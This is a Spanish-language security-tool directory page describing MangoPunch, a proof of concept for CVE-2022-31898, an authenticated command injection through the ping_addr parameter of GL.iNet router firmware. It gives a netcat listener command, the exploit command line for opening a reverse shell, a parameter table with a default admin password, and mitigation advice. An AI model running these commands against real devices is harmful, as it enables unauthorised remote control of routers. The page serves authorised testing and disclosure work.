Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
MangoPunch-CVE-2022-31898 — Herramienta de Inyección de Comandos Autenticada (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
Herramientas/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

Herramienta de Inyección de Comandos Autenticada (CVE-2022-31898) - HACKCONRD 2026.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 5 mesesAún no revisado

🥭 MangoPunch: CVE-2022-31898

Inyección de Comandos del Sistema Operativo Autenticada para Dispositivos GL.iNet

Python CVE Security

root@kitploit:~
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 Resumen de la Vulnerabilidad

Este repositorio contiene una Prueba de Concepto (PoC) técnica para una vulnerabilidad de Ejecución Remota de Comandos (RCE) encontrada en el GL.iNet MT300N-V2 (Mango) y otros modelos que ejecutan versiones de firmware inferiores a 3.215.

La falla existe en el parámetro ping_addr de la API de diagnóstico, permitiendo a un atacante autenticado ejecutar comandos arbitrarios del sistema a través de metacaracteres de shell (;).


🚀 Guía de Ejecución

1. Preparar tu Listener

Abre una terminal en tu máquina atacante (Kali Linux) e inicia un listener de Netcat:

root@kitploit:~
nc -lvnp 9292

2. Ejecutar el Exploit

Usa el siguiente comando para activar la shell inversa:

root@kitploit:~
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ Parámetros del Script


🛡️ Mitigación

  • Actualizar Firmware: Asegúrate de que tu dispositivo esté ejecutando la versión 3.215 o superior.
  • Validación de Entrada: Los desarrolladores deben implementar una validación estricta con Regex para los parámetros de IP/Hostname y evitar funciones que invoquen el shell y pasen cadenas sin procesar al sistema operativo.

Aviso Legal: Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. El autor no se hace responsable de ningún uso indebido. MangoPunch: CVE-2022-31898

Descargar herramienta
FlagNombre CompletoDescripciónPor Defecto
-R--rhostIP del objetivo remoto (Router)Requerido
-P--rportPuerto de administración web443
-L--lhostIP del listener (Kali/Atacante)Requerido
-l--lportPuerto del listenerRequerido
-p--pwdContraseña de administradorgoodlife
-t--httpsHabilitar HTTPSFalse